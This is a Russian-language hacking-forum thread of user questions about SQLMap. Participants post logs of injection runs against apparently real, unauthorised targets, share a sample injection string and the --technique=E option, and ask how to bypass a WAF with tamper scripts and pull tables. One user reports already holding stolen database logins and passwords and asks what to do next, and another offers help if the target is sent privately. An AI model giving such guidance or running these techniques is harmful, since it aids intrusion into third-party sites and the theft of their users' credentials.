Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. bustudo

    bustudo New Member

    Joined:
    18 Aug 2016
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    неужели с помощью опций нельзя указать тип SQL инъекции и конкретный пэйлоад?
     
  2. Shubka75

    Shubka75 Elder - Старейшина

    Joined:
    24 Sep 2015
    Messages:
    94
    Likes Received:
    57
    Reputations:
    30
    Самому выбрать подходящий пэйлоад нельзя, но в вашем логе был еррор-басед вектор, поэтому вы можете указать тип инъекции, дописав --technique=E
     
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Тип можно. Нагрузку тоже вроде можно
     
  4. korneev

    korneev New Member

    Joined:
    24 Aug 2016
    Messages:
    13
    Likes Received:
    3
    Reputations:
    2
    Была как то раз такая задача. Указывал место инъекции через * (навроде ?id=334'+OR+'24'='24'+*+--+) а для выбора пейлоада пришлось править XML, где эти пейлоады прописаны.
     
  5. bustudo

    bustudo New Member

    Joined:
    18 Aug 2016
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Спасибо, я получил логины и пароли пользователей СУБД, как их использоватьвместе с SQLmap -ом,что дальше делать то))
     
  6. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    194
    Likes Received:
    5
    Reputations:
    0
    [10:21:10] [INFO] fetching tables for database: pinc
    [10:21:10] [INFO] the SQL query used returns 291 entries
    [10:21:10] [INFO] starting 10 threads
    [10:21:11] [INFO] heuristics detected web page charset 'ascii'
    Database: pincY3mc7_aqwert
    [1 table]
    +-----------+
    | UpText |
    +-----------+

    [10:21:37] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 291 times, 500 (Internal Server Error) - 1 times

    Не получается получить все таблицы
     
  7. andrei369

    andrei369 New Member

    Joined:
    19 Feb 2013
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    [15:22:19] [INFO] fetched random HTTP User-Agent header from file 'C:\sqlmap-mas
    ter\txt\user-agents.txt': 'Opera/7.23 (Windows 98; U) [en]'
    [15:22:19] [INFO] testing connection to the target URL
    [15:22:19] [WARNING] there is a DBMS error found in the HTTP response body which
    could interfere with the results of the tests
    [15:22:19] [CRITICAL] previous heuristics detected that the target is protected
    by some kind of WAF/IPS/IDS
    [15:22:19] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
    [15:22:22] [CRITICAL] WAF/IDS/IPS identified as 'Generic (Unknown)'. Please cons
    ider usage of tamper scripts (option '--tamper')
    are you sure that you want to continue with further target testing? [y/N]

    Подскажите пож-та как обойти Waf Generic ?
     
  8. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    разберись что такое waf generic, что он фильтрует
     
    _________________________
  9. andrei369

    andrei369 New Member

    Joined:
    19 Feb 2013
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Я не знаю, поэтому и спрашиваю!
    Какой --tamper использовать ?
     
  10. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    я тоже не знаю какой тампер использовать, хз что это за waf, может для него тампера вообще нет
    надо разбираться как работает этот waf и тогда уже можно думать какие тамперы использовать
    пью растворимый кофе, гущи нет, хз что это за generic
     
    _________________________
  11. Roger96

    Roger96 New Member

    Joined:
    13 Oct 2015
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    [​IMG]

    как бороться?
     
  12. Roger96

    Roger96 New Member

    Joined:
    13 Oct 2015
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    более "доступного" ответа и не ожидал.
     
  13. Roger96

    Roger96 New Member

    Joined:
    13 Oct 2015
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    мне не жалко,будь у тебя нормальный ответ,а не очередное набивание постов
     
  14. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    194
    Likes Received:
    5
    Reputations:
    0
    web application technology: Nginx
    back-end DBMS: MySQL >= 5.5
    banner: '5.5.44-0+deb7u1'
    [20:47:43] [INFO] fetching database names
    [20:47:43] [WARNING] the SQL query provided does not return any output
    [20:47:43] [INFO] fetching number of databases
    [20:47:43] [WARNING] (case) time-based comparison requires larger statistical mo
    del, please wait.............................. (done)
    [20:47:44] [WARNING] it is very important to not stress the network adapter duri
    ng usage of time-based payloads to prevent potential disruptions

    [20:47:44] [ERROR] unable to retrieve the number of databases
    [20:47:44] [INFO] falling back to current database
    [20:47:44] [INFO] fetching current database
    [20:47:44] [INFO] resumed: martin
    available databases [1]:
    [*] martin

    [20:47:44] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 1 times

    Не могу получить таблицы
     
  15. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    таргет в лс кинь.
     
    _________________________
  16. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    "available databases" говорит что доступа к information_schema нет, не удивительно что списка баз/таблиц нету)
    брутфорс имхо, скульмап вроде это даже умеет

    ----------------------
    хотя не исключаю что может быть какой то waf
    -v 3 в помощь
     
    _________________________
  17. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    194
    Likes Received:
    5
    Reputations:
    0
    а темпера нет по инфсхему?
     
  18. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    ручками надо, ручками.
     
  19. AppS

    AppS Member

    Joined:
    8 Aug 2009
    Messages:
    249
    Likes Received:
    25
    Reputations:
    6
    Как решить

    [CRITICAL] can't establish SSL connection

    что в гугле нашел. чет не решается))
     
  20. zagruzkaaa

    zagruzkaaa New Member

    Joined:
    7 Jul 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    как решить?)

    [CRITICAL] unable to connect to the target URL ('Connection reset by peer'). sqlmap is going to retry the request(s)